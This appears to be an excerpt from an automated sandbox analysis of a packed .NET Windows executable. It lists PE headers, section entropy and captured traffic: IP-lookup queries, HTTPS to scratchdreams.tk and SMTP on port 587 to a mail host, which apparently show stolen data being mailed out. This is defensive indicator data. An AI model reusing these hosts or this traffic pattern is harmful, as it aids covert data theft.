                                                                                      Icon Hash:90cececece8e8eb0
                                                                                      Entrypoint:0x47ff32
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x9C6E185A [Sat Mar 1 16:54:50 2053 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x7fedf0x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x5ac.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x820000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x7e5ac0x70.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x7df380x7e000eb843018ee6da3f75192f19223f27181False0.9553997705853174data7.962304539562137IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x800000x5ac0x600967a749b422fb9546ce082c9f2118e0eFalse0.4212239583333333data4.083969760278833IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x820000xc0x20051d5faa8bc7c37d97b71f0da8131303dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_VERSION0x800900x31cdata0.435929648241206
                                                                                      RT_MANIFEST0x803bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 4, 2024 01:20:57.462249041 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:57.703901052 CEST8049735193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:20:57.704248905 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:57.704248905 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:57.945775986 CEST8049735193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:20:57.947427988 CEST8049735193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:20:57.955967903 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:58.198860884 CEST8049735193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.247026920 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:58.380393028 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.380429983 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.380491972 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.387375116 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.387388945 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.648689985 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.648767948 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.653230906 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.653239012 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.653534889 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.697906971 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.740243912 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.943761110 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.943862915 CEST44349736172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.943944931 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.949177027 CEST49736443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:58.953051090 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:59.195441008 CEST8049735193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.197999954 CEST49737443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:59.198020935 CEST44349737172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.198107004 CEST49737443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:59.198579073 CEST49737443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:59.198587894 CEST44349737172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.247040987 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:59.456084967 CEST44349737172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.457640886 CEST49737443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:59.457652092 CEST44349737172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.767004013 CEST44349737172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.767139912 CEST44349737172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:20:59.767294884 CEST49737443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:59.767641068 CEST49737443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:20:59.771033049 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:20:59.772238970 CEST4973880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:00.010092020 CEST8049738193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.010174036 CEST4973880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:00.010502100 CEST4973880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:00.012604952 CEST8049735193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.012655973 CEST4973580192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:00.247884989 CEST8049738193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.249517918 CEST8049738193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.258902073 CEST49739443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:00.258932114 CEST44349739172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.259000063 CEST49739443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:00.259447098 CEST49739443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:00.259459972 CEST44349739172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.293895960 CEST4973880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:00.530822039 CEST44349739172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.532664061 CEST49739443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:00.532679081 CEST44349739172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.833949089 CEST44349739172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.834091902 CEST44349739172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:00.834156036 CEST49739443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:00.834491014 CEST49739443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:00.838702917 CEST4974080192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:01.074820995 CEST8049740193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.074897051 CEST4974080192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:01.075114012 CEST4974080192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:01.311289072 CEST8049740193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.312144995 CEST8049740193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.313636065 CEST49741443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:01.313680887 CEST44349741172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.313759089 CEST49741443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:01.314052105 CEST49741443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:01.314062119 CEST44349741172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.356470108 CEST4974080192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:01.573170900 CEST44349741172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.574830055 CEST49741443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:01.574851036 CEST44349741172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.877820015 CEST44349741172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.877939939 CEST44349741172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:01.877999067 CEST49741443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:01.878387928 CEST49741443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:01.881539106 CEST4974080192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:01.882519960 CEST4974280192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:02.117778063 CEST8049740193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.117870092 CEST4974080192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:02.123049021 CEST8049742193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.123133898 CEST4974280192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:02.123254061 CEST4974280192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:02.365925074 CEST8049742193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.367398977 CEST8049742193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.368681908 CEST49743443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:02.368716955 CEST44349743172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.368801117 CEST49743443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:02.369050980 CEST49743443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:02.369066000 CEST44349743172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.418895006 CEST4974280192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:02.625092983 CEST44349743172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.626640081 CEST49743443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:02.626656055 CEST44349743172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.931055069 CEST44349743172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.931183100 CEST44349743172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:02.931241035 CEST49743443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:02.931626081 CEST49743443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:02.934756994 CEST4974280192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:02.935729980 CEST4974480192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:03.172337055 CEST8049744193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.172435045 CEST4974480192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:03.172621012 CEST4974480192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:03.175195932 CEST8049742193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.175251007 CEST4974280192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:03.409136057 CEST8049744193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.409989119 CEST8049744193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.411539078 CEST49745443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:03.411567926 CEST44349745172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.411649942 CEST49745443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:03.411890030 CEST49745443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:03.411900997 CEST44349745172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.465815067 CEST4974480192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:03.671797037 CEST44349745172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.673227072 CEST49745443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:03.673242092 CEST44349745172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.974780083 CEST44349745172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.974906921 CEST44349745172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:03.974956036 CEST49745443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:03.975428104 CEST49745443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:03.978549004 CEST4974480192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:03.979880095 CEST4974680192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:04.215152025 CEST8049744193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.215338945 CEST4974480192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:04.221057892 CEST8049746193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.221136093 CEST4974680192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:04.221275091 CEST4974680192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:04.462522030 CEST8049746193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.463762999 CEST8049746193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.465015888 CEST49747443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:04.465040922 CEST44349747172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.465121031 CEST49747443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:04.465393066 CEST49747443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:04.465403080 CEST44349747172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.512649059 CEST4974680192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:04.725568056 CEST44349747172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:04.727046967 CEST49747443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:04.727063894 CEST44349747172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.028724909 CEST44349747172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.028950930 CEST44349747172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.028995991 CEST49747443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.032601118 CEST49747443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.037205935 CEST4974680192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:05.038397074 CEST4974880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:05.278434038 CEST8049746193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.278507948 CEST4974680192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:05.279963970 CEST8049748193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.280040979 CEST4974880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:05.280213118 CEST4974880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:05.521764994 CEST8049748193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.522617102 CEST8049748193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.523699999 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.523736954 CEST44349749172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.523797035 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.524034977 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.524049044 CEST44349749172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.575129032 CEST4974880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:05.779833078 CEST44349749172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:05.825138092 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.884190083 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:05.884198904 CEST44349749172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:06.087543964 CEST44349749172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:06.087697983 CEST44349749172.67.177.134192.168.2.4
                                                                                      Apr 4, 2024 01:21:06.087764978 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:06.103822947 CEST49749443192.168.2.4172.67.177.134
                                                                                      Apr 4, 2024 01:21:06.115992069 CEST4974880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:06.357681036 CEST8049748193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:21:06.357759953 CEST4974880192.168.2.4193.122.6.168
                                                                                      Apr 4, 2024 01:21:07.737317085 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:07.737337112 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:07.737411976 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:07.737842083 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:07.737855911 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:08.006627083 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:08.006818056 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:08.008372068 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:08.008378983 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:08.008675098 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:08.009941101 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:08.056235075 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:39.222846031 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:39.222903013 CEST44349750104.21.27.85192.168.2.4
                                                                                      Apr 4, 2024 01:21:39.222992897 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:39.236762047 CEST49750443192.168.2.4104.21.27.85
                                                                                      Apr 4, 2024 01:21:44.603158951 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:44.799479961 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:44.799578905 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:45.017853975 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:45.018009901 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:45.213675022 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:45.213936090 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:45.214875937 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:45.414038897 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:45.416604042 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:45.617820978 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:45.618011951 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:45.816104889 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:45.816266060 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:46.029256105 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:46.031955004 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:21:46.229124069 CEST58749757208.91.199.225192.168.2.4
                                                                                      Apr 4, 2024 01:21:46.229202986 CEST49757587192.168.2.4208.91.199.225
                                                                                      Apr 4, 2024 01:22:05.249310970 CEST8049738193.122.6.168192.168.2.4
                                                                                      Apr 4, 2024 01:22:05.249381065 CEST4973880192.168.2.4193.122.6.168
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Apr 4, 2024 01:20:57.331588030 CEST6317553192.168.2.41.1.1.1
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST53631751.1.1.1192.168.2.4
                                                                                      Apr 4, 2024 01:20:58.251255989 CEST6127953192.168.2.41.1.1.1
                                                                                      Apr 4, 2024 01:20:58.379722118 CEST53612791.1.1.1192.168.2.4
                                                                                      Apr 4, 2024 01:21:06.115909100 CEST6186953192.168.2.41.1.1.1
                                                                                      Apr 4, 2024 01:21:06.507666111 CEST53618691.1.1.1192.168.2.4
                                                                                      Apr 4, 2024 01:21:44.476408005 CEST5918653192.168.2.41.1.1.1
                                                                                      Apr 4, 2024 01:21:44.602540970 CEST53591861.1.1.1192.168.2.4
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Apr 4, 2024 01:20:57.331588030 CEST192.168.2.41.1.1.10x7285Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:58.251255989 CEST192.168.2.41.1.1.10xa473Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:06.115909100 CEST192.168.2.41.1.1.10x4e71Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:44.476408005 CEST192.168.2.41.1.1.10x4b0cStandard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST1.1.1.1192.168.2.40x7285No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST1.1.1.1192.168.2.40x7285No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST1.1.1.1192.168.2.40x7285No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST1.1.1.1192.168.2.40x7285No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST1.1.1.1192.168.2.40x7285No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:57.456849098 CEST1.1.1.1192.168.2.40x7285No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:58.379722118 CEST1.1.1.1192.168.2.40xa473No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:20:58.379722118 CEST1.1.1.1192.168.2.40xa473No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:06.507666111 CEST1.1.1.1192.168.2.40x4e71No error (0)scratchdreams.tk104.21.27.85A (IP address)IN (0x0001)false
                                                                                      Apr 4, 2024 01:21:06.507666111 CEST1.1.1.1192.168.2.40x4e71No error (0)scratchdreams.tk172.67.169.18A (IP address)IN (0x0001)false
